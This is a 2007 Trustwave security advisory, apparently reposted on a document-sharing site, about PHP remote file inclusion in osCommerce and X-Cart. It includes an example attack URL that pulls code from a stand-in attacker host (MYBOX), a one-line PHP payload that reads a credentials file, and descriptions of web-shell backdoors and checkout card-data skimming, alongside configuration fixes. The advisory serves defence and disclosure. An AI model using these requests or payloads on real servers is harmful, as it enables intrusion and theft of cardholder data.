E-commerce Security Advisory: PHP Remote File Inclusion

russianmiserableΑσφάλεια

13 Ιουν 2012 (πριν από 5 χρόνια και 5 μήνες)

359 εμφανίσεις

70 W. Madison Street, Suite 1050 Chicago, IL 60602 www.trustwave.com
1.888.878.7817 Copyright 2007










 






E-commerce Security Advisory:
PHP Remote File Inclusion

70 W. Madison Street, Suite 1050 Chicago, IL 60602 www.trustwave.com
1.888.878.7817 Copyright 2007


2
E-commerce Security Advisory: PHP Remote File Inclusion


Executive Summary
In investigations of approximately 300 payment card data security breaches, Trustwave’s
compromise investigations unit has observed an increase in the successful exploitation of PHP-
based e-commerce Web sites via remote file-inclusion vulnerabilities. We believe that this
increase is due to the prevalence of PHP-based e-commerce applications and the ease with which
an attacker can exploit these applications’ vulnerabilities.

In recent months, Trustwave’s compromise investigations unit has encountered multiple cases in
which an attacker took advantage of remote file inclusion vulnerabilities in PHP-based e-
commerce applications. The vendors of these applications have released updates to secure the
vulnerabilities, but the root problem lies in the application user’s configuration of the applications
and installation of PHP programming language on their server.

Properly configuring the PHP programming language on a server can easily eliminate a system’s
vulnerability to PHP remote file-inclusion exploits. Two configuration directives included within
PHP, register_globals and allow_url_open, make the PHP remote file inclusion exploit possible.
When enabled, either of these directives may allow malicious users to execute their own PHP
code on a vulnerable system.

Fortunately, through the php.ini configuration file, register_globals and allow_url_open directives
can be disabled easily. In addition, PHP versions 4.2.0 or later disable register_globals by default,
and the directive is not included in PHP version 6.0.

Trustwave recommends that online merchants perform stringent code reviews to ensure that
their e-commerce applications are properly patched and that the PHP on their servers is securely
configured.

PHP Remote File Inclusion
Trustwave has seen an increase in the successful exploitation of PHP-based e-commerce Web
sites via remote file-inclusion vulnerabilities. We believe this increase is due to the prevalent use
of PHP-based e-commerce applications and the simplicity of exploiting these vulnerabilities.

PHP remote file inclusion allows an attacker to run their own PHP code on a vulnerable Web site.
PHP is particularly susceptible to the remote file-inclusion exploit because the default installation
of vulnerable versions that leaves register_globals or allow_url_open enabled on the server opens
a route through which a remote system can execute PHP code as if it were located on the local
system.

For example, the include_once.php script included with vulnerable versions of the PHP-based
osCommerce Online Merchant application provides one such route. The contents of the
include_once.php script include the following:
.
-------- include_once.php --------
<?
if (!defined($include_file . '__')) {
define($include_file . '__', 1);
include($include_file);
}
?>
----------------------------------

70 W. Madison Street, Suite 1050 Chicago, IL 60602 www.trustwave.com
1.888.878.7817 Copyright 2007


3
E-commerce Security Advisory: PHP Remote File Inclusion

An attacker can then use this file to arbitrarily set the include_file parameter to include code
present on a remote Web site. The attacker would then simply enter the following into their
browser (IE, Mozilla):

http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php

This request would execute the a.php script located on the attacker’s Web site (MYBOX) on the
e-commerce server. The code included will vary depending on the attacker’s goals.

For example, the following command would output the contents of the application_top.php file
present on the e-commerce Web site. The contents of the file include authentication credentials
(username, password, database location) for the backend MySQL customer database.

--- a.php ---
<? passthru("/bin/cat application_top.php")?>
-------------

In an actual case of PHP remote file inclusion, the code executed would be significantly more
complex than in this example and often results in the download of Web-based backdoors to the
local system. Two common Web-based backdoors are r57shell and c99shell. These shells include
a Web-based interface that enables their user to download and upload files, create backdoor
listeners that monitor traffic on the system, send e-mail, bounce connections to other servers and
administrate SQL databases.

The following represents the main interface of the r57shell:


70 W. Madison Street, Suite 1050 Chicago, IL 60602 www.trustwave.com
1.888.878.7817 Copyright 2007


4
E-commerce Security Advisory: PHP Remote File Inclusion

With the r57shell copied to the compromised system, the attacker can easily modify existing Web
code from a local Internet browser. In many cases the attacker will modify PHP code associated
with the e-commerce application checkout process to send cardholder data to an external e-mail
account or force the storage of cardholder data to the backend database for the attacker to
retrieve at a later date.


PHP Remote File Inclusion Diagram




Targeted PHP-based E-commerce Applications and Remediation
In a number of our recent investigations of payment card compromises, Trustwave has found a
number of attacks targeting vulnerable versions of PHP-based e-commerce applications such as
osCommerce and X-Cart. In these investigations, Trustwave has uncovered multiple cases in
which an attacker utilizes a remote file-inclusion exploit to gain access to a system and extract
sensitive information. We suspect that this increase can be traced to the prevalent use of
vulnerable versions of these applications and the ease with which these vulnerabilities can be
exploited.

The most common manifestation of the PHP remote file-inclusion exploit observed by Trustwave
results in the download of a malicious Web-based backdoor onto an e-commerce server and the
subsequent alteration of PHP code associated with the checkout process allowing for the harvest
of cardholder data.










70 W. Madison Street, Suite 1050 Chicago, IL 60602 www.trustwave.com
1.888.878.7817 Copyright 2007


5
E-commerce Security Advisory: PHP Remote File Inclusion

Remote file inclusion vulnerabilities in both the osCommerce and X-Cart applications have been
publicly disclosed:

Remote file inclusion vulnerabilities
Application
Vulnerable File
Disclosure
Date
Reference
osCommerce Online
Merchant v2.1
include_once.php 06/16/2002 Bugtraq ID: 5037
Qualiteam X-Cart 4.x cmpi.php 09/08/2006 Bugtraq ID:
20108
Qualiteam X-Cart 3.5.0 config.php
prepare.php
smarty.php
product.php
auth.php
09/11/2007 Bugtraq ID:
25637

Although the vendors listed above have released updates to patch the vulnerabilities, the root
problem lies on the application user’s side with the configuration of the PHP programming
language on their server.

E-commerce merchants can easily avoid PHP remote file inclusion exploits by properly configuring
the PHP programming language installed on their server. The majority of PHP remote file-
inclusion exploits are possible because of two configuration directives included within PHP;
register_globals and allow_url_open. When enabled, either of these directives may allow the
inclusion of files from a remote site for local execution.

An administrator can easily disable the register_globals and allow_url_open directives in the
php.ini configuration file. In PHP versions 4.2.0 or later, register_globals is disabled by default. In
PHP 6.0, the register_globals directive has been removed altogether.

In conclusion, to protect against PHP remote file-inclusion exploits, Trustwave recommends that
e-commerce merchants perform stringent code reviews to ensure that their e-commerce
applications are properly patched and securely configured. At the very least, this process should
include disabling the register_globals and allow_url_open PHP directives in the php.ini
configuration file.


About Trustwave
Trustwave is the leading provider of on-demand and subscription-based information security and
payment card industry compliance management solutions to businesses and government entities
throughout the world. For organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive solutions that include its
flagship TrustKeeper® compliance management software and other proprietary security solutions.
Trustwave has helped more than 30,000 organizations—ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers—manage compliance and secure their network
infrastructure, data communications and critical information assets. Trustwave is headquartered in
Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For
more information, visit https://www.trustwave.com/
.